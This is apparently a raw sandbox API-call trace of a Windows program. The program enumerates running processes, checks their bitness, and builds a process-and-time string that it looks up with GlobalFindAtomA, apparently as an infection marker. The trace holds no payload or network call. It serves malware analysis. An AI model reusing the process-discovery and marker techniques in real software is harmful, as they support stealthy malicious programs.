	[0127.619] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x2dc
	[0127.619] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.620] CloseHandle (hObject=0x2dc) returned 1
	[0127.620] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x39b5970, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0127.620] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x2dc
	[0127.620] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.620] CloseHandle (hObject=0x2dc) returned 1
	[0127.620] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x39b9af0, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0127.620] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x2dc
	[0127.620] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.620] CloseHandle (hObject=0x2dc) returned 1
	[0127.621] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x39b5b08, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0127.621] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x2dc
	[0127.621] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.621] CloseHandle (hObject=0x2dc) returned 1
	[0127.621] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x39b5c10, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0127.621] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x2dc
	[0127.621] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.621] CloseHandle (hObject=0x2dc) returned 1
	[0127.621] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0127.622] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x2dc
	[0127.622] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.622] CloseHandle (hObject=0x2dc) returned 1
	[0127.622] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x39b59e8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0127.622] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x2dc
	[0127.622] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.622] CloseHandle (hObject=0x2dc) returned 1
	[0127.622] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x399d1a8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0127.623] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x2dc
	[0127.623] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.623] CloseHandle (hObject=0x2dc) returned 1
	[0127.623] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x39b9af0, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0127.623] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x2dc
	[0127.623] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.623] CloseHandle (hObject=0x2dc) returned 1
	[0127.623] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x39b9af0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0127.623] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x2dc
	[0127.623] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.624] CloseHandle (hObject=0x2dc) returned 1
	[0127.624] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x39b5a48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0127.624] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x2dc
	[0127.624] GetLastError () returned 0x5
	[0127.624] GetLastError () returned 0x5
	[0127.624] GetLastError () returned 0x5
	[0127.624] GetLastError () returned 0x5
	[0127.624] GetLastError () returned 0x5
	[0127.624] GetLastError () returned 0x5
	[0127.624] GetLastError () returned 0x5
	[0127.624] GetLastError () returned 0x5
	[0127.624] GetLastError () returned 0x5
	[0127.624] GetLastError () returned 0x5
	[0127.624] GetLastError () returned 0x5
	[0127.624] GetLastError () returned 0x5
	[0127.624] GetLastError () returned 0x5
	[0127.624] GetLastError () returned 0x5
	[0127.624] GetLastError () returned 0x5
	[0127.624] GetLastError () returned 0x5
	[0127.624] GetLastError () returned 0x5
	[0127.624] GetLastError () returned 0x5
	[0127.624] GetLastError () returned 0x5
	[0127.624] GetLastError () returned 0x5
	[0127.624] GetLastError () returned 0x5
	[0127.624] GetLastError () returned 0x5
	[0127.624] GetLastError () returned 0x5
	[0127.624] GetLastError () returned 0x5
	[0127.624] GetLastError () returned 0x5
	[0127.624] GetLastError () returned 0x5
	[0127.625] GetLastError () returned 0x5
	[0127.625] GetLastError () returned 0x5
	[0127.625] GetLastError () returned 0x5
	[0127.625] GetLastError () returned 0x5
	[0127.625] GetLastError () returned 0x5
	[0127.625] GetLastError () returned 0x5
	[0127.625] GetLastError () returned 0x5
	[0127.625] GetLastError () returned 0x5
	[0127.625] GetLastError () returned 0x5
	[0127.625] GetLastError () returned 0x5
	[0127.625] GetLastError () returned 0x5
	[0127.625] GetLastError () returned 0x5
	[0127.625] GetLastError () returned 0x5
	[0127.625] GetLastError () returned 0x5
	[0127.625] GetLastError () returned 0x5
	[0127.625] GetLastError () returned 0x5
	[0127.625] GetLastError () returned 0x5
	[0127.625] GetLastError () returned 0x5
	[0127.625] GetLastError () returned 0x5
	[0127.625] GetLastError () returned 0x5
	[0127.625] GetLastError () returned 0x5
	[0127.625] GetLastError () returned 0x5
	[0127.625] GetLastError () returned 0x5
	[0127.625] GetLastError () returned 0x5
	[0127.625] GetLastError () returned 0x5
	[0127.625] GetLastError () returned 0x5
	[0127.625] GetLastError () returned 0x5
	[0127.625] GetLastError () returned 0x5
	[0127.625] GetLastError () returned 0x5
	[0127.625] GetLastError () returned 0x5
	[0127.625] GetLastError () returned 0x5
	[0127.625] GetLastError () returned 0x5
	[0127.625] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0127.626] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0127.626] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0127.626] GetLastError () returned 0x5
	[0127.626] GetLastError () returned 0x5
	[0127.626] GetLastError () returned 0x5
	[0127.626] GetLastError () returned 0x5
	[0127.626] GetLastError () returned 0x5
	[0127.626] GetLastError () returned 0x5
	[0127.626] GetLastError () returned 0x5
	[0127.626] GetLastError () returned 0x5
	[0127.626] GetLastError () returned 0x5
	[0127.626] GetLastError () returned 0x5
	[0127.626] GetLastError () returned 0x5
	[0127.626] GetLastError () returned 0x5
	[0127.626] GetLastError () returned 0x5
	[0127.626] GetLastError () returned 0x5
	[0127.626] GetLastError () returned 0x5
	[0127.626] GetLastError () returned 0x5
	[0127.626] GetLastError () returned 0x5
	[0127.626] GetLastError () returned 0x5
	[0127.626] GetLastError () returned 0x5
	[0127.626] GetLastError () returned 0x5
	[0127.626] GetLastError () returned 0x5
	[0127.626] GetLastError () returned 0x5
	[0127.626] GetLastError () returned 0x5
	[0127.626] GetLastError () returned 0x5
	[0127.626] GetLastError () returned 0x5
	[0127.626] GetLastError () returned 0x5
	[0127.626] wsprintfA (in: param_1=0x3993380, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0127.626] GetLastError () returned 0x5
	[0127.626] GetLastError () returned 0x5
	[0127.626] GetLastError () returned 0x5
	[0127.626] GetLastError () returned 0x5
	[0127.626] GetLastError () returned 0x5
	[0127.626] GetLastError () returned 0x5
	[0127.626] GetLastError () returned 0x5
	[0127.626] GetLastError () returned 0x5
	[0127.627] GetLastError () returned 0x5
	[0127.627] GetLastError () returned 0x5
	[0127.627] GetLastError () returned 0x5
	[0127.627] GetLastError () returned 0x5
	[0127.627] GetLastError () returned 0x5
	[0127.627] GetLastError () returned 0x5
	[0127.627] GetLastError () returned 0x5
	[0127.627] GetLastError () returned 0x5
	[0127.627] GetLastError () returned 0x5
	[0127.627] GetLastError () returned 0x5
	[0127.627] GetLastError () returned 0x5
	[0127.627] GetLastError () returned 0x5
	[0127.627] GetLastError () returned 0x5
	[0127.627] GetLastError () returned 0x5
	[0127.627] GetLastError () returned 0x5
	[0127.627] GetLastError () returned 0x5
	[0127.627] GetLastError () returned 0x5
	[0127.627] GetLastError () returned 0x5
	[0127.627] GetLastError () returned 0x5
	[0127.627] GetLastError () returned 0x5
	[0127.627] GetLastError () returned 0x5
	[0127.627] GetLastError () returned 0x5
	[0127.627] GetLastError () returned 0x5
	[0127.627] GetLastError () returned 0x5
	[0127.627] GetLastError () returned 0x5
	[0127.627] GetLastError () returned 0x5
	[0127.627] GetLastError () returned 0x5
	[0127.627] GetLastError () returned 0x5
	[0127.627] GetLastError () returned 0x5
	[0127.627] GetLastError () returned 0x5
	[0127.627] GetLastError () returned 0x5
	[0127.627] GetLastError () returned 0x5
	[0127.627] GetLastError () returned 0x5
	[0127.627] GetLastError () returned 0x5
	[0127.627] GetLastError () returned 0x5
	[0127.627] GetLastError () returned 0x5
	[0127.627] GetLastError () returned 0x5
	[0127.627] GetLastError () returned 0x5
	[0127.627] GetLastError () returned 0x5
	[0127.627] GetLastError () returned 0x5
	[0127.627] GetLastError () returned 0x5
	[0127.628] GetLastError () returned 0x5
	[0127.628] GetLastError () returned 0x5
	[0127.628] GetLastError () returned 0x5
	[0127.628] GetLastError () returned 0x5
	[0127.628] GetLastError () returned 0x5
	[0127.628] GetLastError () returned 0x5
	[0127.628] GetLastError () returned 0x5
	[0127.628] GetLastError () returned 0x5
	[0127.628] GetLastError () returned 0x5
	[0127.628] GetLastError () returned 0x5
	[0127.628] GetLastError () returned 0x5
	[0127.628] GetLastError () returned 0x5
	[0127.628] GetLastError () returned 0x5
	[0127.628] GetLastError () returned 0x5
	[0127.628] GetLastError () returned 0x5
	[0127.628] GetLastError () returned 0x5
	[0127.628] GetLastError () returned 0x5
	[0127.628] GetLastError () returned 0x5
	[0127.628] GetLastError () returned 0x5
	[0127.628] GetLastError () returned 0x5
	[0127.628] GetLastError () returned 0x5
	[0127.628] GetLastError () returned 0x5
	[0127.628] GetLastError () returned 0x5
	[0127.628] GetLastError () returned 0x5
	[0127.628] GetLastError () returned 0x5
	[0127.628] GetLastError () returned 0x5
	[0127.628] GetLastError () returned 0x5
	[0127.628] GetLastError () returned 0x5
	[0127.628] GetLastError () returned 0x5
	[0127.628] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0127.628] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0127.629] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0127.629] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0127.629] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0127.629] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0127.629] CloseHandle (hObject=0x2dc) returned 1
	[0127.629] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0127.629] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x39b5a48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0127.629] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x2dc
	[0127.629] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.630] CloseHandle (hObject=0x2dc) returned 1
	[0127.630] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=7, lpMultiByteStr=0x69d668, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd.exe", lpUsedDefaultChar=0x0) returned 7
	[0127.630] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x2dc
	[0127.630] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.630] CloseHandle (hObject=0x2dc) returned 1
	[0127.630] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x39b5970, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0127.630] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x2dc
	[0127.630] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.630] CloseHandle (hObject=0x2dc) returned 1
	[0127.631] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="conhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.631] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb0) returned 0x2dc
	[0127.631] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.631] CloseHandle (hObject=0x2dc) returned 1
	[0127.631] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PING.EXE", cchWideChar=8, lpMultiByteStr=0x39b5c10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PING.EXE", lpUsedDefaultChar=0x0) returned 8
	[0127.631] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2e4) returned 0x2dc
	[0127.631] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.631] CloseHandle (hObject=0x2dc) returned 1
	[0127.632] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0127.665] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0127.665] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x39b5bb0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0127.665] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0127.665] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b5c10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0127.666] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0127.666] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.666] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0127.666] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b5b08, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0127.666] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0127.666] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x39b5970, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0127.667] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0127.667] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x39b5c10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0127.667] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0127.667] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x39b5b98, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0127.667] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0127.668] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0127.668] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0127.668] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x69d5d8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0127.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0127.669] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.669] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0127.669] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.669] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0127.669] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0127.670] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0127.670] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0127.671] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.671] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0127.671] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.671] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0127.671] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x2dc
	[0127.672] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.672] CloseHandle (hObject=0x2dc) returned 1
	[0127.672] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x39b5b98, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0127.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0127.672] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0127.673] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0127.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x2dc
	[0127.673] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.673] CloseHandle (hObject=0x2dc) returned 1
	[0127.673] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x399d188, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0127.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0127.673] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.674] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x2dc
	[0127.674] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.674] CloseHandle (hObject=0x2dc) returned 1
	[0127.674] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x39b5b98, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0127.674] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x2dc
	[0127.674] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.674] CloseHandle (hObject=0x2dc) returned 1
	[0127.674] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0127.674] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x2dc
	[0127.674] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.675] CloseHandle (hObject=0x2dc) returned 1
